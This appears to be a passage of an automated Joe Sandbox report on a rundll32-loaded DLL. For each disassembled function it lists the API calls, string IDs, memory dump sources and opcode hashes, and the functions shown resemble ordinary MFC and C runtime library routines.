                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset
                                                                                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                      • API String ID: 2102423945-4122032997
                                                                                                                      • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                      • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 1529587224-3470857405
                                                                                                                      • Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                      • Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
                                                                                                                      • Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                      • Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                      • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                      • API String ID: 2418878492-2500072749
                                                                                                                      • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                      • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                      • _memset.LIBCMT ref: 1001579D
                                                                                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                      • LoadBitmapA.USER32 ref: 10015807
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271682439-3916222277
                                                                                                                      • Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                      • Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
                                                                                                                      • Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                      • Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                      • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                      • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2429671754-3916222277
                                                                                                                      • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                      • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                      • String ID: B$DISPLAY
                                                                                                                      • API String ID: 3136151823-3316187204
                                                                                                                      • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                      • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Edit
                                                                                                                      • API String ID: 0-554135844
                                                                                                                      • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                      • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                      • SendMessageA.USER32 ref: 10023CD9
                                                                                                                      • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                      • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 187318432-0
                                                                                                                      • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                      • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69039007-0
                                                                                                                      • Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                      • Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
                                                                                                                      • Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                      • Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                      • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                      • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                      • _memset.LIBCMT ref: 10020424
                                                                                                                      • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 289641511-0
                                                                                                                      • Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                      • Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
                                                                                                                      • Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                      • Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                        • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                        • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                        • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                        • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                      • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                        • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                      • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2731880238-0
                                                                                                                      • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                      • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                      • SetWindowLongA.USER32 ref: 10012989
                                                                                                                        • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
